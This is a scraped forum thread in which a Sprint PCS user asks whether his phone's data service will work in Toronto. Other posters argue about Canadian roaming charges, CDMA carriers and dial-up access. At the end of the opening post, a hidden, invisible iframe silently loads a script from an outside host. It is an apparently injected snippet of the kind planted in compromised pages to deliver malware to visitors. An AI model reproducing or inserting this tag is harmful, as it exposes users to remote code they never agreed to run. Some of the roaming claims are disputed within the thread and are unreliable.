+ Reply to Thread
    K7AAY Treo 650/Cing & Nokia9300/TMo johnbartley's Avatar

Toronto - data service?

Will be ravelling to Toronto in three weeks.

WIll data service work there?

I know the canadian CDMA carriers there are Telus and Bill Mobility; but, will I be able to send/receive e-mail and browse the web?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

sprint pcs beta tester macmetal666's Avatar
    youll be lucky to get analog towers to carry your telephone service.....as for data better get the local earthlink or aol access no and get service for the pda.....thats the only way to get data service. btw any call you make will have long distance charges as well as int. roaming charges even if you are calling accross the street or across the world. just cause you are in a foriegn country.

good luck- best thing to do is turn the unit off and use the landline.
    my i500 is more obsolete than your ti-99 or apple IIe

> youll be lucky to get analog towers to carry your telephone service.....

Wilth good reports regarding both Bell Mobility and Telus? Hmm. WHen were you last in Toronto?

> as for data better get the local earthlink or aol access no and get service for the pda.....thats the only way to get data service.

No, there _is_ data service there... the question is, is it accessible from a SprintPCS celphone?

> btw any call you make will have long distance charges as well as int. roaming charges even if you are calling accross the street or across the world. just cause you are in a foriegn country.

Perhaps your plan does not cover that - mine does.

> good luck- best thing to do is turn the unit off and use the landline.

Again, when were you last in Toronto with your i300?

oh about 2 weeks ago i was in timmins and then last week i was in detroit/windsor-- phone was trying to work off of american side and was pretty sucessful.
    telus or bell mobility do NOT offer roaming to sprint customers with out incurring ld/roaming charges plus a daily connection fee.
    also what plan do you have? i have access to any sprint pcs plan ever introduced and NONE of them have service in CANADA. except their old gsm system, which wouldnt work with a cdma phone anyways. HOWEVER Prime-Co still offers cdma service in some parts of canada for some of its wisconsin/michigan/minnesota customers most of the towers are located on the american side.(timmins area only)

as for the data service NO YOU CANNOT ACCESS IT FROM A SPRINT PCS TELE. YOU MUST USE A DIAL UP CONNECTION FROM A LANDLINE SERVER SUCH AS AOL/EARTHLINK/MINDSPRING ETC....THIS WILL INCURR LONG DISTANCE CHARGES AS WELL AS ROAMING RATES, EVEN IF YOU HAVE A NO LD TO CANADA OPTION ON YOUR PLAN. thats for calls originating in the 49 states (hawaii doesnt matter anyways)

you miight want to check your sprint bill for more info or you can sit on hold with claire and they will tell you the same!

parlez vous ne connection pas? tres mal!

Roaming en Canada

is US$0.35/min on the federal plan.

different story...govt plans have a unique advantage over consumer...it is a bidding war with the govt....consumer plans have much higher charges.

btw... roam au canada